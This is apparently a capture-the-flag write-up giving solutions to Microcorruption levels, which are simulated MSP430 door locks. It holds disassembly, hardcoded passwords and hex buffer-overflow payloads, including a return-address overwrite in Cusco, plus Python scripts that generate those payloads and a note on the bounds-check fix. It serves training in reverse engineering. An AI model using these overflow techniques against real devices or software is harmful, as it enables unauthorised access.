microcorruption
My solutions to the fantastic Microcorruption exercises.
Tutorial
The check_password routine walks the input, counting bytes in r12 until it reaches the null terminator, then compares the count with 9 (eight characters plus the terminator). Only the length is checked:
4484: 6e4f mov.b @r15, r14
4486: 1f53 inc r15
4488: 1c53 inc r12
448a: 0e93 tst r14
448c: fb23 jnz $-0x8 <check_password+0x0>
448e: 3c90 0900 cmp #0x9, r12
4492: 0224 jz $+0x6 <check_password+0x14>
Any eight-character input is valid, for example:
password
New Orleans
Password is hardcoded and located at address 0x2400.
2400: 764f 7050 6e4b 5300 0000 0000 0000 0000 vOpPnKS.
Solution:
vOpPnKS
Sydney
The password is hardcoded in the check_password routine:
448a <check_password>
448a: bf90 4f78 0000 cmp #0x784f, 0x0(r15)
4490: 0d20 jnz $+0x1c <check_password+0x22>
4492: bf90 3b77 0200 cmp #0x773b, 0x2(r15)
4498: 0920 jnz $+0x14 <check_password+0x22>
449a: bf90 2b74 0400 cmp #0x742b, 0x4(r15)
44a0: 0520 jnz $+0xc <check_password+0x22>
44a2: 1e43 mov #0x1, r14
44a4: bf90 5d2f 0600 cmp #0x2f5d, 0x6(r15)
44aa: 0124 jz $+0x4 <check_password+0x24>
Solution (hex, byte ordering is little endian):
4f783b772b745d2f
ASCII equivalent:
Ox;w+t]/
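To make the little-endian step explicit, here is an added Python example (not part of the original solutions) that packs the four cmp immediates from the listing above into the byte string the routine expects and models the comparison chain; decode_password and check_password are my own names for this illustration.

```python
import struct

# The cmp immediates from the Sydney check_password disassembly, in the
# order they are compared against offsets 0x0, 0x2, 0x4, 0x6 of the input.
SYDNEY_IMMEDIATES = [0x784F, 0x773B, 0x742B, 0x2F5D]


def decode_password(immediates):
    """Turn 16-bit cmp immediates into the byte string the routine expects.

    The MSP430 is little-endian, so cmp #0x784f, 0x0(r15) matches the input
    bytes 0x4f 0x78 ('O', 'x') in that order; struct's '<H' produces the
    same byte ordering.
    """
    return b"".join(struct.pack("<H", imm) for imm in immediates)


def check_password(candidate, immediates=SYDNEY_IMMEDIATES):
    """Model of the routine: compare the first 8 bytes as four 16-bit words.

    Returns True only when every word matches, mirroring the jnz chain that
    bails out on the first mismatch.
    """
    if len(candidate) < 2 * len(immediates):
        return False
    for i, imm in enumerate(immediates):
        word = struct.unpack_from("<H", candidate, 2 * i)[0]
        if word != imm:
            return False
    return True


if __name__ == "__main__":
    pw = decode_password(SYDNEY_IMMEDIATES)
    print(pw.hex())            # 4f783b772b745d2f
    print(pw.decode("ascii"))  # Ox;w+t]/
    print(check_password(pw))  # True
```

The hex output matches the solution above; running the bytes back through check_password confirms the decoding round-trips.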
Hanoi
The input password does not matter. Instead, there is a hardcoded comparison of 0xb with the value at 0x2410.
4552: 3f40 d344 mov #0x44d3 "Testing if password is valid.", r15
4556: b012 de45 call #0x45de <puts>
455a: f290 0b00 1024 cmp.b #0xb, &0x2410
4560: 0720 jnz $+0x10 <login+0x50>
4562: 3f40 f144 mov #0x44f1 "Access granted.", r15
4566: b012 de45 call #0x45de <puts>
456a: b012 4844 call #0x4448 <unlock_door>
The input password is stored at 0x2400, so we can input a long enough string to set 0x2410 to 0xb. Solution in hex:
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb0b
The first 16 bytes (bb repeated) fill 0x2400 to 0x240f; the final byte 0b sets 0x2410 to 0xb.
Cusco
At the end of the login function the stack pointer points to 0x43fe, while the input password is stored at 0x43ee. That means we can overwrite the return address at 0x43fe with the address of the unlock_door function, 0x4446.
Solution in hex:
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb4644
The first 16 bytes (bb repeated) fill 0x43ee up to 0x43fe; the final two bytes 4644 land at 0x43fe and, read little-endian, are the unlock_door address 0x4446.
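Hanoi and Cusco share one defect: the input is read into a fixed buffer with no length check, so bytes past the end land on whatever the routine trusts next (the compared byte at 0x2410 in Hanoi, the saved return address at 0x43fe in Cusco). The added Python example below, which is not code from the original repository, lays out both payloads from the addresses given above so the common structure is visible; overflow_payload and the two wrapper functions are my own names.

```python
import struct


def overflow_payload(buffer_addr, target_addr, value, width, filler=0xBB):
    """Lay out input that starts at buffer_addr and reaches target_addr.

    buffer_addr: where the program stores the input.
    target_addr: the address whose contents the routine later trusts.
    value/width: the value to land there, as 1 or 2 little-endian bytes.
    Returns the hex string in the form the Microcorruption debugger accepts.
    """
    if target_addr < buffer_addr:
        raise ValueError("target must lie at or beyond the buffer start")
    fmt = {1: "<B", 2: "<H"}[width]
    padding = bytes([filler]) * (target_addr - buffer_addr)
    return (padding + struct.pack(fmt, value)).hex()


def hanoi_payload():
    # Input buffer at 0x2400; cmp.b #0xb, &0x2410 reads the trusted byte.
    return overflow_payload(0x2400, 0x2410, 0x0B, 1)


def cusco_payload():
    # Input buffer at 0x43ee; saved return address at 0x43fe;
    # unlock_door at 0x4446, written little-endian as 46 44.
    return overflow_payload(0x43EE, 0x43FE, 0x4446, 2)


if __name__ == "__main__":
    print(hanoi_payload())  # bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb0b
    print(cusco_payload())  # bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb4644
```

Both payloads come out as 16 filler bytes followed by the packed value, because in each level the trusted location sits exactly 16 bytes past the start of the input buffer. The fix on the firmware side is the same in both cases: bound the read to the buffer size so the input can never reach the following bytes.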